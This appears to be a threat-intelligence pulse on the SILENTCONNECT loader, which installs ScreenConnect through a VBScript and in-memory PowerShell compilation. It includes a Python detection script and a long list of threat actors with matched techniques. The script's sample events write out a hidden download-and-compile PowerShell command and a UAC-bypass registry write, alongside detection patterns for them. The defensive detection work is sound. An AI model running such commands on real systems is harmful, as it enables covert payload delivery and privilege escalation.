Trusted Design

From Invitation to Infection: How SILENTCONNECT Delivers ScreenConnect

Overview

SILENTCONNECT is a newly identified loader used in active campaigns to silently install ScreenConnect, a legitimate remote monitoring and management (RMM) tool, on victim machines. The infection chain starts with the victim being redirected to a Cloudflare Turnstile CAPTCHA page dressed up as a digital invitation. Clicking through downloads a VBScript file; the script launches PowerShell, which fetches C# source code and compiles and runs it in memory. SILENTCONNECT also applies evasion techniques including PEB masquerading (rewriting the image path and command line that the process's own Process Environment Block reports, so tools that read those fields see a benign process) and a UAC bypass. The campaigns stage content on trusted hosting providers such as Google Drive and Cloudflare and abuse living-off-the-land binaries, so each component looks benign or is signed on its own. The loader has been active since March 2025. Because the final payload is a legitimately signed RMM client that antivirus will not flag, detection has to key on the delivery chain (a script host spawning PowerShell, in-memory compilation, an RMM installer launched from a user-writable path) and on whether ScreenConnect is sanctioned in the environment at all.
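The summary above describes a delivery chain whose end product is a legitimate tool, so a hunt has to score the stages rather than the payload. The following Python is an added example written for this page, not code from the original report or from any vendor: it runs constructed process-creation records (field names modelled on Sysmon Event ID 1: Image, ParentImage, CommandLine, OriginalFileName) through checks for the stages the summary names. The sample events, the regular expressions and the UAC-bypass registry markers are all assumptions; the page does not say which UAC bypass SILENTCONNECT uses, and true PEB masquerading is only visible in process memory, so the OriginalFileName comparison is a cheap on-disk proxy, not a PEB check.

```python
"""Hunt the SILENTCONNECT-style delivery chain in process-creation telemetry.

Added example for this page, not code from the original report. The record
layout mimics Sysmon Event ID 1 (Image, ParentImage, CommandLine,
OriginalFileName); the sample events below are constructed, not real.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str                    # full path of the created process
    parent_image: str             # full path of the parent process
    command_line: str
    original_file_name: str = ""  # OriginalFileName from PE version info (Sysmon EID 1)


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Stage markers. These patterns are assumptions chosen to match the behaviours
# the summary names; they are not indicators taken from the report.
INMEM_COMPILE = re.compile(
    r"add-type|csharpcodeprovider|\[reflection\.assembly\]::load|system\.reflection\.assembly",
    re.I)
DOWNLOAD = re.compile(
    r"drive\.google\.com|downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient",
    re.I)
# Registry paths abused by common UAC bypasses (fodhelper, ComputerDefaults, eventvwr).
# Assumed markers: the page does not say which bypass SILENTCONNECT uses.
UAC_BYPASS = re.compile(
    r"ms-settings\\shell\\open\\command|mscfile\\shell\\open\\command|fodhelper|computerdefaults|eventvwr",
    re.I)
SCREENCONNECT = re.compile(
    r"screenconnect\.clientsetup|screenconnect\.windowsclient|connectwisecontrol", re.I)


def basename(path):
    """Lower-case file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return the chain stages this single event matches (empty list = nothing)."""
    findings = []
    img, parent = basename(ev.image), basename(ev.parent_image)
    if img in POWERSHELL and parent in SCRIPT_HOSTS:
        findings.append("script host spawned PowerShell")
    if img in POWERSHELL and INMEM_COMPILE.search(ev.command_line):
        findings.append("in-memory C# compile/load from PowerShell")
    if img in POWERSHELL and DOWNLOAD.search(ev.command_line):
        findings.append("payload download from web or trusted hosting")
    if UAC_BYPASS.search(ev.command_line):
        findings.append("UAC bypass marker")
    if (SCREENCONNECT.search(img) or SCREENCONNECT.search(ev.command_line)) \
            and parent in (POWERSHELL | SCRIPT_HOSTS):
        findings.append("ScreenConnect launched by a script interpreter")
    # On-disk masquerading proxy: the file name disagrees with the PE's own
    # OriginalFileName. PEB masquerading itself is only visible in memory.
    if ev.original_file_name and ev.original_file_name.lower() != img:
        findings.append(f"image {img} != OriginalFileName {ev.original_file_name}")
    return findings


def triage(events):
    """(index, findings) for every event that matched at least one stage."""
    return [(i, f) for i, ev in enumerate(events) if (f := score_event(ev))]


# Constructed sample telemetry: lure VBScript -> PowerShell in-memory C# ->
# ScreenConnect client, a benign svchost, and a UAC-bypass registry write.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\wscript.exe", r"C:\Windows\explorer.exe",
              r'wscript.exe "C:\Users\u\Downloads\Invitation.vbs"'),
    ProcEvent(PS, r"C:\Windows\System32\wscript.exe",
              "powershell.exe -w hidden -ep bypass -c \"$s=(New-Object Net.WebClient)"
              ".DownloadString('https://drive.google.com/uc?id=EXAMPLE');"
              "Add-Type -TypeDefinition $s\""),
    ProcEvent(r"C:\Users\u\AppData\Local\Temp\ScreenConnect.ClientSetup.exe", PS,
              "ScreenConnect.ClientSetup.exe /silent",
              original_file_name="ScreenConnect.ClientSetup.exe"),
    ProcEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\services.exe",
              "svchost.exe -k netsvcs", original_file_name="svchost.exe"),
    ProcEvent(r"C:\Windows\System32\reg.exe", PS,
              r'reg.exe add "HKCU\Software\Classes\ms-settings\shell\open\command"'
              r' /ve /d "C:\Users\u\AppData\Local\Temp\x.exe" /f'),
]

if __name__ == "__main__":
    for idx, findings in triage(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"[{idx}] {basename(ev.parent_image)} -> {basename(ev.image)}")
        for f in findings:
            print("     -", f)
```

The per-event checks are deliberately independent so that a single PowerShell record carrying several markers scores higher than a benign admin script that trips only one; in a real pipeline the next step is to join the hits by process GUID into the parent/child chain and alert when the script-host, in-memory-compile and RMM-install stages all occur within one lineage.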

Created: 2026-03-20


Similar Pulses

No similar Pulses were found.

Threat actors related to this Pulse (fact-based)

Dragonfly

Score: 47.16
Matched TTPs:
  • T1156 - Malicious Shell Modification
  • T1584.008 - Network Devices
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1140 - Deobfuscate/Decode Files or Information
  • T1009 - Binary Padding
  • T1059.009 - Cloud API
  • T1555.003 - Credentials from Web Browsers
  • T1590.006 - Network Security Appliances
  • T1175 - Component Object Model and Distributed COM
  • T1219.001 - IDE Tunneling
  • T1657 - Financial Theft
  • T1497.002 - User Activity Based Checks
  • T1041 - Exfiltration Over C2 Channel
  • T1059.001 - PowerShell
  • T1199 - Trusted Relationship
  • T1097 - Pass the Ticket
  • T1157 - Dylib Hijacking
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1546.016 - Installer Packages
  • T1134 - Access Token Manipulation
  • T1547.013 - XDG Autostart Entries
  • T1548.006 - TCC Manipulation

BRONZE BUTLER

Score: 34.62
Matched TTPs:
  • T1156 - Malicious Shell Modification
  • T1568.002 - Domain Generation Algorithms
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1003.007 - Proc Filesystem
  • T1059.010 - AutoHotKey & AutoIT
  • T1558 - Steal or Forge Kerberos Tickets
  • T1219.001 - IDE Tunneling
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1218.010 - Regsvr32
  • T1562.011 - Spoof Security Alerting
  • T1059.012 - Hypervisor CLI
  • T1027.010 - Command Obfuscation
  • T1134 - Access Token Manipulation
  • T1159 - Launch Agent
  • T1547.013 - XDG Autostart Entries
  • T1008 - Fallback Channels

Gamaredon Group

Score: 70.12
Matched TTPs:
  • T1156 - Malicious Shell Modification
  • T1087.002 - Domain Account
  • T1562.009 - Safe Mode Boot
  • T1547.012 - Print Processors
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1684 - Social Engineering
  • T1205 - Traffic Signaling
  • T1059.009 - Cloud API
  • T1045 - Software Packing
  • T1175 - Component Object Model and Distributed COM
  • T1219.001 - IDE Tunneling
  • T1612 - Build Image on Host
  • T1218.012 - Verclsid
  • T1608 - Stage Capabilities
  • T1608.005 - Link Target
  • T1606.001 - Web Cookies
  • T1497.002 - User Activity Based Checks
  • T1554 - Compromise Host Software Binary
  • T1055.014 - VDSO Hijacking
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1061 - Graphical User Interface
  • T1059.011 - Lua
  • T1547.002 - Authentication Package
  • T1059.013 - Container CLI/API
  • T1027.010 - Command Obfuscation
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode

OilRig

Score: 62.49
Matched TTPs:
  • T1156 - Malicious Shell Modification
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1562.009 - Safe Mode Boot
  • T1003.007 - Proc Filesystem
  • T1574.014 - AppDomainManager
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1005 - Data from Local System
  • T1586.002 - Email Accounts
  • T1558 - Steal or Forge Kerberos Tickets
  • T1009 - Binary Padding
  • T1059.009 - Cloud API
  • T1562.012 - Disable or Modify Linux Audit System
  • T1555.003 - Credentials from Web Browsers
  • T1590.006 - Network Security Appliances
  • T1051 - Shared Webroot
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1097 - Pass the Ticket
  • T1157 - Dylib Hijacking
  • T1218.010 - Regsvr32
  • T1592.002 - Software
  • T1556.009 - Conditional Access Policies
  • T1027.010 - Command Obfuscation
  • T1209 - Time Providers
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
  • T1547.008 - LSASS Driver

APT28

Score: 60.11
Matched TTPs:
  • T1156 - Malicious Shell Modification
  • T1685.001 - Disable or Modify Windows Event Log
  • T1206 - Sudo Caching
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1140 - Deobfuscate/Decode Files or Information
  • T1558 - Steal or Forge Kerberos Tickets
  • T1555.003 - Credentials from Web Browsers
  • T1027.016 - Junk Code Insertion
  • T1547.011 - Plist Modification
  • T1175 - Component Object Model and Distributed COM
  • T1219.001 - IDE Tunneling
  • T1608.005 - Link Target
  • T1497.002 - User Activity Based Checks
  • T1059.001 - PowerShell
  • T1199 - Trusted Relationship
  • T1097 - Pass the Ticket
  • T1157 - Dylib Hijacking
  • T1547.002 - Authentication Package
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1146 - Clear Command History
  • T1668 - Exclusive Control
  • T1547.013 - XDG Autostart Entries
  • T1548.006 - TCC Manipulation
  • T1027.018 - Invisible Unicode
  • T1566.003 - Spearphishing via Service

MoustachedBouncer

Score: 5.43
Matched TTPs:
  • T1156 - Malicious Shell Modification
  • T1045 - Software Packing
  • T1497.002 - User Activity Based Checks

GOLD SOUTHFIELD

Score: 7.15
Matched TTPs:
  • T1156 - Malicious Shell Modification
  • T1140 - Deobfuscate/Decode Files or Information
  • T1586.002 - Email Accounts
  • T1497.002 - User Activity Based Checks

APT42

Score: 21.84
Matched TTPs:
  • T1156 - Malicious Shell Modification
  • T1091 - Replication Through Removable Media
  • T1583.001 - Domains
  • T1059.009 - Cloud API
  • T1562.012 - Disable or Modify Linux Audit System
  • T1590.006 - Network Security Appliances
  • T1175 - Component Object Model and Distributed COM
  • T1612 - Build Image on Host
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1027.010 - Command Obfuscation

Magic Hound

Score: 53.22
Matched TTPs:
  • T1156 - Malicious Shell Modification
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1036.009 - Break Process Trees
  • T1140 - Deobfuscate/Decode Files or Information
  • T1547.005 - Security Support Provider
  • T1009 - Binary Padding
  • T1059.009 - Cloud API
  • T1555.003 - Credentials from Web Browsers
  • T1590.006 - Network Security Appliances
  • T1045 - Software Packing
  • T1219.001 - IDE Tunneling
  • T1608.005 - Link Target
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information
  • T1683 - Generate Content
  • T1187 - Forced Authentication
  • T1547.002 - Authentication Package
  • T1059.012 - Hypervisor CLI
  • T1027.010 - Command Obfuscation
  • T1134 - Access Token Manipulation
  • T1209 - Time Providers
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
  • T1547.008 - LSASS Driver

MuddyWater

Score: 65.00
Matched TTPs:
  • T1156 - Malicious Shell Modification
  • T1568.002 - Domain Generation Algorithms
  • T1206 - Sudo Caching
  • T1087.002 - Domain Account
  • T1547.012 - Print Processors
  • T1089 - Disabling Security Tools
  • T1059.010 - AutoHotKey & AutoIT
  • T1140 - Deobfuscate/Decode Files or Information
  • T1586.002 - Email Accounts
  • T1518.002 - Backup Software Discovery
  • T1562.012 - Disable or Modify Linux Audit System
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1219.001 - IDE Tunneling
  • T1051 - Shared Webroot
  • T1218.012 - Verclsid
  • T1059.008 - Network Device CLI
  • T1608.005 - Link Target
  • T1497.002 - User Activity Based Checks
  • T1059.001 - PowerShell
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1547.002 - Authentication Package
  • T1218.010 - Regsvr32
  • T1562.011 - Spoof Security Alerting
  • T1059.013 - Container CLI/API
  • T1027.010 - Command Obfuscation
  • T1159 - Launch Agent
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode

Winter Vivern

Score: 24.20
Matched TTPs:
  • T1156 - Malicious Shell Modification
  • T1059.010 - AutoHotKey & AutoIT
  • T1140 - Deobfuscate/Decode Files or Information
  • T1558 - Steal or Forge Kerberos Tickets
  • T1548 - Abuse Elevation Control Mechanism
  • T1175 - Component Object Model and Distributed COM
  • T1219.001 - IDE Tunneling
  • T1497.002 - User Activity Based Checks
  • T1218.001 - Compiled HTML File
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode

Silence

Score: 19.30
Matched TTPs:
  • T1156 - Malicious Shell Modification
  • T1087.002 - Domain Account
  • T1684 - Social Engineering
  • T1059.009 - Cloud API
  • T1547.011 - Plist Modification
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1027.010 - Command Obfuscation
  • T1134 - Access Token Manipulation
  • T1547.013 - XDG Autostart Entries
  • T1027.007 - Dynamic API Resolution

Volt Typhoon

Score: 70.60
Matched TTPs:
  • T1156 - Malicious Shell Modification
  • T1685.001 - Disable or Modify Windows Event Log
  • T1562.009 - Safe Mode Boot
  • T1003.007 - Proc Filesystem
  • T1556.002 - Password Filter DLL
  • T1176 - Software Extensions
  • T1059.010 - AutoHotKey & AutoIT
  • T1140 - Deobfuscate/Decode Files or Information
  • T1070.008 - Clear Mailbox Data
  • T1547.005 - Security Support Provider
  • T1059.009 - Cloud API
  • T1562.012 - Disable or Modify Linux Audit System
  • T1555.003 - Credentials from Web Browsers
  • T1590.006 - Network Security Appliances
  • T1045 - Software Packing
  • T1219.001 - IDE Tunneling
  • T1049 - System Network Connections Discovery
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1488 - Disk Content Wipe
  • T1546.016 - Installer Packages
  • T1134 - Access Token Manipulation
  • T1209 - Time Providers
  • T1159 - Launch Agent
  • T1547.013 - XDG Autostart Entries
  • T1574.002 - DLL Side-Loading
  • T1548.006 - TCC Manipulation
  • T1569.002 - Service Execution

APT39

Score: 40.07
Matched TTPs:
  • T1156 - Malicious Shell Modification
  • T1087.002 - Domain Account
  • T1059.010 - AutoHotKey & AutoIT
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1547.011 - Plist Modification
  • T1219.001 - IDE Tunneling
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1097 - Pass the Ticket
  • T1157 - Dylib Hijacking
  • T1547.002 - Authentication Package
  • T1001.003 - Protocol or Service Impersonation
  • T1564.007 - VBA Stomping
  • T1027.010 - Command Obfuscation
  • T1134 - Access Token Manipulation
  • T1209 - Time Providers
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
  • T1027.007 - Dynamic API Resolution
  • T1569.002 - Service Execution

Kimsuky

Score: 97.45
Matched TTPs:
  • T1156 - Malicious Shell Modification
  • T1037 - Boot or Logon Initialization Scripts
  • T1033 - System Owner/User Discovery
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1003.007 - Proc Filesystem
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1140 - Deobfuscate/Decode Files or Information
  • T1684 - Social Engineering
  • T1205 - Traffic Signaling
  • T1009 - Binary Padding
  • T1059.009 - Cloud API
  • T1562.012 - Disable or Modify Linux Audit System
  • T1555.003 - Credentials from Web Browsers
  • T1557.003 - DHCP Spoofing
  • T1590.006 - Network Security Appliances
  • T1219.001 - IDE Tunneling
  • T1051 - Shared Webroot
  • T1218.012 - Verclsid
  • T1552.003 - Shell History
  • T1608 - Stage Capabilities
  • T1608.005 - Link Target
  • T1497.002 - User Activity Based Checks
  • T1041 - Exfiltration Over C2 Channel
  • T1055.014 - VDSO Hijacking
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1059.011 - Lua
  • T1027.014 - Polymorphic Code
  • T1690 - Prevent Command History Logging
  • T1547.002 - Authentication Package
  • T1656 - Impersonation
  • T1565.002 - Transmitted Data Manipulation
  • T1027.010 - Command Obfuscation
  • T1668 - Exclusive Control
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
  • T1003.003 - NTDS
  • T1008 - Fallback Channels

Dark Caracal

Score: 8.66
Matched TTPs:
  • T1156 - Malicious Shell Modification
  • T1087.002 - Domain Account
  • T1219.001 - IDE Tunneling
  • T1059.012 - Hypervisor CLI
  • T1547.008 - LSASS Driver

FIN7

Score: 54.85
Matched TTPs:
  • T1156 - Malicious Shell Modification
  • T1606.002 - SAML Tokens
  • T1206 - Sudo Caching
  • T1087.002 - Domain Account
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1140 - Deobfuscate/Decode Files or Information
  • T1586.002 - Email Accounts
  • T1205 - Traffic Signaling
  • T1009 - Binary Padding
  • T1011.001 - Exfiltration Over Bluetooth
  • T1218.012 - Verclsid
  • T1584.005 - Botnet
  • T1608.005 - Link Target
  • T1564.002 - Hidden Users
  • T1497.002 - User Activity Based Checks
  • T1059.001 - PowerShell
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
  • T1547.002 - Authentication Package
  • T1027.010 - Command Obfuscation
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
  • T1027.007 - Dynamic API Resolution

Mustang Panda

Score: 71.89
Matched TTPs:
  • T1037 - Boot or Logon Initialization Scripts
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1089 - Disabling Security Tools
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1555.003 - Credentials from Web Browsers
  • T1136.001 - Local Account
  • T1590.006 - Network Security Appliances
  • T1219.001 - IDE Tunneling
  • T1612 - Build Image on Host
  • T1218.012 - Verclsid
  • T1569.001 - Launchctl
  • T1608 - Stage Capabilities
  • T1608.005 - Link Target
  • T1497.002 - User Activity Based Checks
  • T1169 - Sudo
  • T1199 - Trusted Relationship
  • T1136.003 - Cloud Account
  • T1059.011 - Lua
  • T1218.010 - Regsvr32
  • T1565.002 - Transmitted Data Manipulation
  • T1027.010 - Command Obfuscation
  • T1134 - Access Token Manipulation
  • T1209 - Time Providers
  • T1159 - Launch Agent
  • T1547.013 - XDG Autostart Entries
  • T1055.005 - Thread Local Storage
  • T1548.006 - TCC Manipulation
  • T1027.018 - Invisible Unicode

Sea Turtle

Score: 28.00
Matched TTPs:
  • T1037 - Boot or Logon Initialization Scripts
  • T1033 - System Owner/User Discovery
  • T1499.003 - Application Exhaustion Flood
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1175 - Component Object Model and Distributed COM
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1218.010 - Regsvr32
  • T1137.004 - Outlook Home Page
  • T1059.013 - Container CLI/API

Ember Bear

Score: 58.22
Matched TTPs:
  • T1033 - System Owner/User Discovery
  • T1564.008 - Email Hiding Rules
  • T1584.008 - Network Devices
  • T1005 - Data from Local System
  • T1140 - Deobfuscate/Decode Files or Information
  • T1558 - Steal or Forge Kerberos Tickets
  • T1059.009 - Cloud API
  • T1555.003 - Credentials from Web Browsers
  • T1027.016 - Junk Code Insertion
  • T1136.002 - Domain Account
  • T1175 - Component Object Model and Distributed COM
  • T1051 - Shared Webroot
  • T1497.002 - User Activity Based Checks
  • T1059.001 - PowerShell
  • T1097 - Pass the Ticket
  • T1597 - Search Closed Sources
  • T1218.010 - Regsvr32
  • T1656 - Impersonation
  • T1519 - Emond
  • T1134 - Access Token Manipulation
  • T1209 - Time Providers
  • T1668 - Exclusive Control
  • T1003.003 - NTDS

Indrik Spider

Score: 27.93
Matched TTPs:
  • T1033 - System Owner/User Discovery
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1003.007 - Proc Filesystem
  • T1059.009 - Cloud API
  • T1574.008 - Path Interception by Search Order Hijacking
  • T1051 - Shared Webroot
  • T1497.002 - User Activity Based Checks
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
  • T1546.016 - Installer Packages
  • T1134 - Access Token Manipulation
  • T1547.013 - XDG Autostart Entries

Agrius

Score: 22.99
Matched TTPs:
  • T1033 - System Owner/User Discovery
  • T1584.008 - Network Devices
  • T1059.010 - AutoHotKey & AutoIT
  • T1140 - Deobfuscate/Decode Files or Information
  • T1558 - Steal or Forge Kerberos Tickets
  • T1555.003 - Credentials from Web Browsers
  • T1027.016 - Junk Code Insertion
  • T1097 - Pass the Ticket
  • T1597 - Search Closed Sources
  • T1134 - Access Token Manipulation
  • T1209 - Time Providers

Contagious Interview

Score: 55.46
Matched TTPs:
  • T1033 - System Owner/User Discovery
  • T1044 - File System Permissions Weakness
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1558 - Steal or Forge Kerberos Tickets
  • T1547.005 - Security Support Provider
  • T1045 - Software Packing
  • T1175 - Component Object Model and Distributed COM
  • T1219.001 - IDE Tunneling
  • T1552.003 - Shell History
  • T1608.005 - Link Target
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1690 - Prevent Command History Logging
  • T1656 - Impersonation
  • T1059.006 - Python
  • T1565.002 - Transmitted Data Manipulation
  • T1027.010 - Command Obfuscation
  • T1221 - Template Injection
  • T1027.018 - Invisible Unicode
  • T1547.008 - LSASS Driver

Sandworm Team

Score: 70.74
Matched TTPs:
  • T1033 - System Owner/User Discovery
  • T1564.008 - Email Hiding Rules
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1005 - Data from Local System
  • T1140 - Deobfuscate/Decode Files or Information
  • T1586.002 - Email Accounts
  • T1558 - Steal or Forge Kerberos Tickets
  • T1562.012 - Disable or Modify Linux Audit System
  • T1555.003 - Credentials from Web Browsers
  • T1557.003 - DHCP Spoofing
  • T1045 - Software Packing
  • T1219.001 - IDE Tunneling
  • T1049 - System Network Connections Discovery
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1059.011 - Lua
  • T1027 - Obfuscated Files or Information
  • T1187 - Forced Authentication
  • T1547.002 - Authentication Package
  • T1218.010 - Regsvr32
  • T1075 - Pass the Hash
  • T1027.010 - Command Obfuscation
  • T1546.016 - Installer Packages
  • T1134 - Access Token Manipulation
  • T1547.013 - XDG Autostart Entries
  • T1548.006 - TCC Manipulation
  • T1027.018 - Invisible Unicode

Star Blizzard

Score: 17.08
Matched TTPs:
  • T1033 - System Owner/User Discovery
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1091 - Replication Through Removable Media
  • T1547.005 - Security Support Provider
  • T1657 - Financial Theft
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking

Lazarus Group

Score: 74.92
Matched TTPs:
  • T1132.001 - Standard Encoding
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1059.010 - AutoHotKey & AutoIT
  • T1070.008 - Clear Mailbox Data
  • T1205 - Traffic Signaling
  • T1009 - Binary Padding
  • T1027.016 - Junk Code Insertion
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1219.001 - IDE Tunneling
  • T1218.012 - Verclsid
  • T1059.008 - Network Device CLI
  • T1608.005 - Link Target
  • T1606.001 - Web Cookies
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1069.001 - Local Groups
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1174 - Password Filter DLL
  • T1547.002 - Authentication Package
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1027.010 - Command Obfuscation
  • T1546.016 - Installer Packages
  • T1209 - Time Providers
  • T1547.013 - XDG Autostart Entries
  • T1055.005 - Thread Local Storage
  • T1547.008 - LSASS Driver
  • T1569.002 - Service Execution

TA577

Score: 5.20
Matched TTPs:
  • T1132.001 - Standard Encoding
  • T1027.018 - Invisible Unicode

Moonstone Sleet

Score: 27.05
Matched TTPs:
  • T1132.001 - Standard Encoding
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1590.006 - Network Security Appliances
  • T1175 - Component Object Model and Distributed COM
  • T1059.011 - Lua
  • T1027 - Obfuscated Files or Information
  • T1547.013 - XDG Autostart Entries
  • T1027.007 - Dynamic API Resolution
  • T1547.008 - LSASS Driver

APT32

Score: 55.24
Matched TTPs:
  • T1110.001 - Password Guessing
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1089 - Disabling Security Tools
  • T1091 - Replication Through Removable Media
  • T1558 - Steal or Forge Kerberos Tickets
  • T1684 - Social Engineering
  • T1547.005 - Security Support Provider
  • T1059.009 - Cloud API
  • T1555.003 - Credentials from Web Browsers
  • T1590.006 - Network Security Appliances
  • T1219.001 - IDE Tunneling
  • T1612 - Build Image on Host
  • T1218.012 - Verclsid
  • T1608.005 - Link Target
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1027.014 - Polymorphic Code
  • T1174 - Password Filter DLL
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1027.010 - Command Obfuscation
  • T1134 - Access Token Manipulation
  • T1209 - Time Providers
  • T1668 - Exclusive Control
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
  • T1027.007 - Dynamic API Resolution

Turla

Score: 63.31
Matched TTPs:
  • T1014 - Rootkit
  • T1606.002 - SAML Tokens
  • T1003.007 - Proc Filesystem
  • T1176 - Software Extensions
  • T1059.010 - AutoHotKey & AutoIT
  • T1684 - Social Engineering
  • T1059.009 - Cloud API
  • T1003.001 - LSASS Memory
  • T1590.006 - Network Security Appliances
  • T1045 - Software Packing
  • T1136.002 - Domain Account
  • T1219.001 - IDE Tunneling
  • T1612 - Build Image on Host
  • T1608.005 - Link Target
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1097 - Pass the Ticket
  • T1597 - Search Closed Sources
  • T1218.001 - Compiled HTML File
  • T1547.002 - Authentication Package
  • T1556.009 - Conditional Access Policies
  • T1059.012 - Hypervisor CLI
  • T1027.010 - Command Obfuscation
  • T1546.016 - Installer Packages
  • T1134 - Access Token Manipulation
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
  • T1569.002 - Service Execution

APT38

Score: 48.10
Matched TTPs:
  • T1568.002 - Domain Generation Algorithms
  • T1087.002 - Domain Account
  • T1685.002 - Disable or Modify Cloud Log
  • T1059.010 - AutoHotKey & AutoIT
  • T1684 - Social Engineering
  • T1009 - Binary Padding
  • T1059.009 - Cloud API
  • T1555.003 - Credentials from Web Browsers
  • T1219.001 - IDE Tunneling
  • T1138 - Application Shimming
  • T1218.012 - Verclsid
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1097 - Pass the Ticket
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information
  • T1174 - Password Filter DLL
  • T1493 - Transmitted Data Manipulation
  • T1059.012 - Hypervisor CLI
  • T1027.010 - Command Obfuscation
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
  • T1027.007 - Dynamic API Resolution

Evilnum

Score: 12.99
Matched TTPs:
  • T1568.002 - Domain Generation Algorithms
  • T1562.009 - Safe Mode Boot
  • T1089 - Disabling Security Tools
  • T1565.002 - Transmitted Data Manipulation
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode

APT37

Score: 23.95
Matched TTPs:
  • T1568.002 - Domain Generation Algorithms
  • T1206 - Sudo Caching
  • T1087.002 - Domain Account
  • T1684 - Social Engineering
  • T1562.012 - Disable or Modify Linux Audit System
  • T1059.011 - Lua
  • T1547.002 - Authentication Package
  • T1218.010 - Regsvr32
  • T1562.011 - Spoof Security Alerting
  • T1059.012 - Hypervisor CLI
  • T1027.010 - Command Obfuscation
  • T1547.013 - XDG Autostart Entries

Cobalt Group

Score: 31.20
Matched TTPs:
  • T1568.002 - Domain Generation Algorithms
  • T1206 - Sudo Caching
